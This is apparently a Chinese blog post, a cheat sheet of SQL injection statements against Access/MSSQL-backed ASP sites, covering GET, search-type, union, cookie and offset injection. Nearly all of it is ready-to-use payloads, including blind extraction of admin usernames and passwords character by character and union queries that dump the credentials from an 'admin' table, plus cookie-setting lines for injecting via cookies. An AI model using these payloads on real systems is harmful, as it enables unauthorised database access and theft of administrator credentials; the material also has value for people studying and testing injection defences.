写点什么

注入语句详解 (get 注入,cookie 注入,搜索型注入等)

作者:喀拉峻
  • 2022 年 3 月 03 日
  • 本文字数:1941 字

    阅读完需:约 6 分钟


注意:对于普通的 get 注入,如果是字符型,前加' 后加 and ''='拆半法 ######################################and exists (select * from MSysAccessObjects) 这个是判断是不是 ACC 数据库,MSysAccessObjects 是 ACCESS 的默认表。and exists (select * from admin)and exists(select id from admin)and exists(select id from admin where id=1)and exists(select id from admin where id>1)然后再测试下 id>1 正常则说明不止一个 ID 然后再 id<50 确定范围 and exists (select username from admin)and exists (select password from admin)and exists (select id from admin where len(username)<10 and id=1)and exists (select id from admin where len(username)>5 and id=1)and exists (select id from admin where len(username)=6 and id=1)and exists (select id from admin where len(password)<10 and id=1)and exists (select id from admin where len(password)>5 and id=1)and exists (select id from admin where len(password)=7 and id=1)and (select top 1 asc(mid(username,1,1)) from admin)=97 返回了正常,说明第一 username 里的第一位内容是 ASC 码的 97,也就是 a。猜第二位把 username,1,1 改成 username,2,1 就可以了。猜密码把 username 改成 password 就 OK 了 ##################################################搜索型注入 ##################################%' and 1=1 and '%'='%' and exists (select * from admin) and '%'='%' and exists(select id from admin where id=1) and '%'='%' and exists (select id from admin where len(username)<10 and id=1) and '%'='%' and exists (select id from admin where len(password)=7 and id=1) and '%'='%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='这里也说明一下,搜索型注入也无他,前加 %' 后加 and '%'='对于 MSSQL 数据库,后面可以吧 and '%'='换成--还有一点搜索型注入也可以使用 union 语句。########################################################联合查询。#####################################order by 10and 1=2 union select 1,2,3,4,5,6,7,8,9,10and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form adminand 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1 很简单。有一点要说明一下,where id=1 这个是爆 ID=1 的管理员的时候,where id=1 就是爆 ID=2 的管理用的,一般不加 where id=1 这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的 id 是多少可不一定哈,说不定是 100 呢!)###################################cookie 注入 ###############################http://www.******.com/shownews.asp?id=127http://www.******.com/shownews.aspalert(="id="+escape("127"));alert(="id="+escape("127 and 1=1"));alert(="id="+escape("127 order by 10"));alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。###################################偏移注入 ###########################################################union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from adminunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from adminunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d ona.id=d.id)and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)

用户头像

喀拉峻

关注

左手Java右手Python,中间纹个C++ 2021.06.26 加入

还未添加个人简介

评论

发布
暂无评论
注入语句详解(get注入,cookie注入,搜索型注入等)_网络安全_喀拉峻_InfoQ写作平台